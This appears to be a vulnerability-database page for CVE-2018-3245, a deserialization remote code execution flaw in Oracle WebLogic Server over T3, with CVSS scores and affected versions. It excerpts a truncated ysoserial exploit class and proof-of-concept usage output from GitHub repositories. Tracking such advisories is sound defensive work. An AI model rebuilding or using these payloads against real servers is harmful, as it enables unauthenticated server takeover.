CVE-2018-3245

Published: 17/10/2018 Updated: 03/10/2019
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 756
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Vulnerable Product

oracle weblogic server 12.1.3.0.0

oracle weblogic server 10.3.6.0.0

oracle weblogic server 12.2.1.3.0

Exploits

// All respects goes to Zhiyi Zhang of 360 ESG Codesafe Team
// URL: blogs.projectmoon.pw/2018/10/19/Oracle-WebLogic-Two-RCE-Deserialization-Vulnerabilities/
package ysoserial.payloads;
import com.sun.jndi.rmi.registry.ReferenceWrapper_Stub;
import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TC ...

Github Repositories

CVE-2018-3245

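Weblogic-CVE-2018-3245 CVE-2018-3245 0x00 Introduction: On October 16 local time (the early morning of October 17 Beijing time), Oracle released its October (third-quarter) Critical Patch Update (CPU), which fixed a WebLogic remote code execution vulnerability (CVE-2018-2893) that the July (second-quarter) CPU had failed to fully fix. The newly fixed vulnerability is numbered CVE-2018-324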

CVE-2018-3245

CVE-2018-3245 Step 1
java -jar ysoserial-cve-2018-3245.jar
WHY SO SERIAL?
Usage: java -jar ysoserial-cve-2018-3245.jar [payload] '[command]'
Available payload types:
Payload Authors Dependencies
------- ------- ------------
CVE_2018_2893_1 @mbechler
CVE_2018_2893_2 @mbechler
CVE_2018_2893_3 @mbechler
CVE_2018_3245 @m

CVE-2018-3245-PoC

CVE-2018-3245 Step 1
java -jar ysoserial-cve-2018-3245.jar
Usage: java -jar ysoserial-cve-2018-3245.jar [payload] '[command]'
Available payload types:
Payload Authors Dependencies
------- ------- ------------
CVE_2018_2893_1 @mbechler
CVE_2018_2893_2 @mbechler
CVE_2018_2893_3 @mbechler
CVE_2018_3245 @mbechler JR